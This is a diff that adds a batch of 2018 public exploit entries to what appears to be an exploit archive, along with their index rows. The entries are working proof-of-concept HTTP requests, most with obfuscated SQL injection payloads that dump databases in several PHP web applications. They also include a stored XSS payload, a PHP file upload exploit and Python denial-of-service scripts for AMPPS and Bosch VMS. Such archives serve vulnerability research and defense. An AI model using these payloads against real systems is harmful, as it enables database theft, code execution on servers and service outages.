+# POC:
+# 1)
+# http://localhost/[PATH]/admin/widget/json/
+#
+POST /PATH/admin/widget/json/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 270
+query=' uniOn SeleCt (SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),2,3,4-- -&qtype=name
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 20:05:56 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=92
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/admin/relReject/table_json/
+#
+POST /PATH/admin/relReject/table_json/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 433
+todate=' union select 1,2,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 19:51:17 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=94
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/helpdezk/operator/queryviewrequest/id/[SQL]
+#
+GET /PATH/helpdezk/operator/queryviewrequest/id/%45%66%65%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%30%78%37%31%36%32%36%62%37%30%37%31%29%29%2d%2d%20%45%66%65 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 19:38:05 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 294
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45848.txt b/exploits/php/webapps/45848.txt
new file mode 100644
index 000000000..9c266f6c8
--- /dev/null
+++ b/exploits/php/webapps/45848.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
+# Date: 2018-11-12
+# Exploit Author: Nawaf Alkeraithe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
+# Version: 1.0
+
+#PoC:
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45849.txt b/exploits/php/webapps/45849.txt
new file mode 100644
index 000000000..7e25daded
--- /dev/null
+++ b/exploits/php/webapps/45849.txt
@@ -0,0 +1,71 @@
+# Exploit Title: EdTv 2 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://edtv.edsup.org/
+# Software Link: https://ayera.dl.sourceforge.net/project/edtv/beta/edtv2go.zip
+# Version: 2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# Improper access restrictions...
+# http://localhost/[PATH]:4001/edtv/index.php/admin/edit_source&?id=[SQL]
+#
+
+# edtv//admin//edit_source.php
+# ....
+#02 $title="แก้ไขแหล่งข้อมูลสื่อ";
+#03 $menu_def="edit_source";
+#04 include("data_menu.php");
+#05
+#06 load_fun("media");
+#07
+#08 if($_POST['title']&&$_POST['url']){
+#09 $ret=update_source($_GET['id'],$_POST['title'],$_POST['url']);
+#10 }
+#11
+#12 if($ret)redirect("admin/data_manage");
+#13
+#14 $data=get_source($_GET['id']);
+# ....
+
+# edtv//admin//data_menu.php
+# ....
+#14 'edit_source' => array(
+#15 'title'=>'แก้ไขแหล่งข้อมูล',
+#16 'url'=>'admin/edit_source&?id='.$_GET['id'],
+#17 'cond'=>$_GET['id']>0,
+#18 ),
+# ....
+
+
+GET /[PATH]/edtv/index.php/admin/edit_source&?id=-1%20union%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--%20- HTTP/1.1
+Host: TARGET:4001
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=c826ffd1a4578bd07c258a5be3ab3482; token_id=1542049202
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Mon, 12 Nov 2018 19:00:38 GMT
+Server: Apache/2.2.15 (Win32) PHP/5.3.2
+X-Powered-By: PHP/5.3.2
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5224
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+# POC:
+# 2)
+# Phpinfo()
+# http://localhost/[PATH]:4001/edtv/info.php
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/45853.txt b/exploits/php/webapps/45853.txt
new file mode 100644
index 000000000..191dcf651
--- /dev/null
+++ b/exploits/php/webapps/45853.txt
@@ -0,0 +1,30 @@
+# Exploit Title: SQL injection in Advanced comment system v1.0
+# Date: 29-10-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: http://www.plohni.com
+# Software Link:
+http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip,
+https://web.archive.org/web/20120214173003/http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
+# Version: Advanced comment system v1.0
+# Tested on: All
+# CVE : CVE-2018-18619
+# Category: webapps
+
+
+1. Description
+
+PHP page internal/advanced_comment_system/admin.php in Advanced Comment
+System 1.0 is prone to an SQL injection vulnerability because it fails to
+sufficiently sanitize user-supplied data before using it in an SQL query,
+allowing remote attackers to execute the sqli attack via a URL in the
+"page" parameter.
+The product is discontinued.
+
+
+2. Proof of Concept
+
+http://x.x.x.x/internal/advanced_comment_system/admin.php?pw=admin&page=/internal/index.php%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71717a6b71,0x67424663534f77556d44746a59686f78427354754268636b5466486249616b724d716e4869634758,0x7171626a71),NULL--%20SkrU&del=2
+
+3. Solution:
+
+The product is discontinued.
\ No newline at end of file
diff --git a/exploits/php/webapps/45855.txt b/exploits/php/webapps/45855.txt
new file mode 100644
index 000000000..3d7eb5580
--- /dev/null
+++ b/exploits/php/webapps/45855.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Rmedia SMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://sms.rmediaindia.com/
+# Software Link: https://master.dl.sourceforge.net/project/rmediasms/rmedia_sms.rar
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/editgrp.php?gid=[SQL]
+#
+GET /[PATH]/editgrp.php?gid=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=31hgqp31e2ten1gk8gousnt0d3
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Sun, 11 Nov 2018 20:04:34 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 234
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45856.txt b/exploits/php/webapps/45856.txt
new file mode 100644
index 000000000..d8b6970fc
--- /dev/null
+++ b/exploits/php/webapps/45856.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Pedidos 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://obedalvarado.pw/
+# Software Link: https://netcologne.dl.sourceforge.net/project/sistema-web-de-pedidos-php/pedidos.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/ajax/load_proveedores.php?q=[SQL]
+#
+GET /[PATH]/ajax/load_proveedores.php?q=%2d%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%33%2c%34%2c%35%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Sun, 11 Nov 2018 21:33:43 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 703
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45857.txt b/exploits/php/webapps/45857.txt
new file mode 100644
index 000000000..249a9942e
--- /dev/null
+++ b/exploits/php/webapps/45857.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Scripting
+# Date: 2018-11-12
+# Exploit Author: Nawaf Alkeraithe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
+# Version: 1.0
+
+When a user signs up for an account on the following url:
+Electricks-shop/pages/user_signup.php
+
+The contact info input field isn't validated before displaying it to the
+admin control panel page where the script will be executed.
+
+Admin Control Panel could be found here:
+/Electricks-shop/pages/admin_panel.php
+
+For testing you could register as an admin here:
+/Electricks-shop/pages/admin_signup.php
+
+POST /Electricks/Electricks/Electricks-shop/pages/user_signup.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/Electricks/Electricks/Electricks-shop/pages/user_signup.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+Cookie: PHPSESSID=f7is0t729t957ec7hbfud4oe98
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+firstname=Nawaf&middlename=test&lastname=Alkeraithe&email=nalkeraithe%
+40gmail.com
+&address=%3Cscript%3Ealert%28%22Stored+XSS%22%29%3C%2Fscript%3E&contact=nawaf&username=testme&password=tesetme&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/45858.txt b/exploits/php/webapps/45858.txt
new file mode 100644
index 000000000..a571e86d1
--- /dev/null
+++ b/exploits/php/webapps/45858.txt
@@ -0,0 +1,118 @@
+# Exploit Title: DoceboLMS 1.2 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.spaghettilearning.com/
+# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/modules/progcourse/lesson.php?id=[SQL]&idC=[SQL]&idU=[SQL]
+#
+GET /[PATH]/modules/progcourse/lesson.php?id=%31%27%20%41%4e%44%20%45%4c%54%28%31%3d%31%2c%31%29%20%41%4e%44%20%27%45%66%65%27%3d%27%45%66%65 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: learning=fd935520ed5eafc7e53bffb101c8de6b
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Mon, 12 Nov 2018 15:28:22 GMT
+Server: Apache/1.3.27 (Win32) PHP/4.3.3
+X-Powered-By: PHP/4.3.3
+Keep-Alive: timeout=15, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html
+
+
+# Exploit Title: DoceboLMS 1.2 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.spaghettilearning.com/
+# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
+#
+POST /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: learning=ab3edb1f569003472985f03a29c58ff3
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------25203287911319136191134967575
+Content-Length: 394
+-----------------------------25203287911319136191134967575
+Content-Disposition: form-data; name="max_file_size"
+10000000000
+-----------------------------25203287911319136191134967575
+Content-Disposition: form-data; name="uploadedfile"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------25203287911319136191134967575--
+HTTP/1.1 200 OK
+Date: Mon, 12 Nov 2018 16:03:33 GMT
+Server: Apache/1.3.27 (Win32) PHP/4.3.3
+X-Powered-By: PHP/4.3.3
+Set-Cookie: learning=ab3edb1f569003472985f03a29c58ff3; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=15, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html
+
+#
+GET /[PATH]/fileCorsi/galleryImg/1542038613.user.phpinfo.php HTTP/1.1
+Host: 192.168.245.133
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
+Cookie: learning=ab3edb1f569003472985f03a29c58ff3
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 12 Nov 2018 16:03:43 GMT
+Server: Apache/1.3.27 (Win32) PHP/4.3.3
+X-Powered-By: PHP/4.3.3
+Keep-Alive: timeout=15, max=97
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html
+
+# POC:
+# 2)
+# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
+#
+# http://localhost/[PATH]/fileCorsi/galleryImg/[FILE]
+#
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/dos/45859.py b/exploits/windows/dos/45859.py
new file mode 100755
index 000000000..c8b71e8f1
--- /dev/null
+++ b/exploits/windows/dos/45859.py
@@ -0,0 +1,30 @@
+# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
+# Discovery by: Daniel
+# Discovery Date: 2018-11-12
+# Software Name: Bosch Video Management System
+# Software Version: 8.0
+# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
+# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
+# Tested on: Windows 10 Pro x64
+
+#Make sure that during the installation of software you installed all the program features available.
+#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.
+
+# Steps to produce the crash:
+# 1.- run: dos.py
+# 2.- Open bosch.txt and copy content to clipboard
+# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
+# 3.- Click on 'Connection:' box and select "Address Book"
+# 4.- Copy clipboard in "(Enterprise) Management Server Address:"
+# 5.- write "test" in 'Username'
+# 6.- Write "test" in 'Password'
+# 7.- Click on 'OK'
+# 8.- Crash
+
+
+#!/usr/bin/python
+
+buf = "\x41" * 64
+f = open('bosch.txt', 'w')
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45850.py b/exploits/windows_x86-64/dos/45850.py
new file mode 100755
index 000000000..8e4068763
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45850.py
@@ -0,0 +1,46 @@
+# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.ampps.com/
+# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
+# Version: 2.7
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+
+#!/usr/bin/python
+import socket
+
+print """
+ \\\|///
+ \\ - - //
+ ( @ @ )
+ ----oOOo--(_)-oOOo----
+ AMPPS 2.7
+ Ihsan Sencan
+ ---------------Ooooo----
+ ( )
+ ooooO ) /
+ ( ) (_/
+ \ (
+ \_)
+"""
+Ip = raw_input("[Ip]: ")
+Port = 80 # Default port
+
+d=[]
+c=0
+while 1:
+ try:
+ d.append(socket.create_connection((Ip,Port)))
+ d[c].send("BOOM")
+ print "Sie!"
+ c+=1
+ except socket.error:
+ print "Done!"
+ raw_input()
+ break
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e6ed45c86..4730679c5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6188,6 +6188,8 @@ id,file,description,date,author,type,platform,port
45823,exploits/macos/dos/45823.py,"CuteFTP Mac 3.1 - Denial of Service (PoC)",2018-11-13,"Yair Rodríguez Aparicio",dos,macos,
45824,exploits/linux/dos/45824.txt,"Evince 3.24.0 - Command Injection",2018-11-13,Matlink,dos,linux,
45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows,
+45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64,
+45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10099,6 +10101,8 @@ id,file,description,date,author,type,platform,port
45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows,
45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows,
45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
+45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,
+45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16947,6 +16951,7 @@ id,file,description,date,author,type,platform,port
45789,exploits/unix/remote/45789.rb,"Morris Worm - sendmail Debug Mode Shell Escape (Metasploit)",2018-11-06,Metasploit,remote,unix,25
45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
+45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40352,3 +40357,13 @@ id,file,description,date,author,type,platform,port
45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
+45845,exploits/php/webapps/45845.txt,"iServiceOnline 1.0 - 'r' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
+45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
+45848,exploits/php/webapps/45848.txt,"Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)",2018-11-14,"Nawaf Alkeraithe",webapps,php,80
+45849,exploits/php/webapps/45849.txt,"EdTv 2 - 'id' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
+45852,exploits/linux/webapps/45852.py,"Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities",2018-11-14,KoreLogic,webapps,linux,
+45853,exploits/php/webapps/45853.txt,"Advanced Comment System 1.0 - SQL Injection",2018-11-14,"Rafael Pedrero",webapps,php,80
+45855,exploits/php/webapps/45855.txt,"Rmedia SMS 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
+45856,exploits/php/webapps/45856.txt,"Pedidos 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
+45857,exploits/php/webapps/45857.txt,"Electricks eCommerce 1.0 - Persistent Cross-Site Scripting",2018-11-14,"Nawaf Alkeraithe",webapps,php,80
+45858,exploits/php/webapps/45858.txt,"DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload",2018-11-14,"Ihsan Sencan",webapps,php,80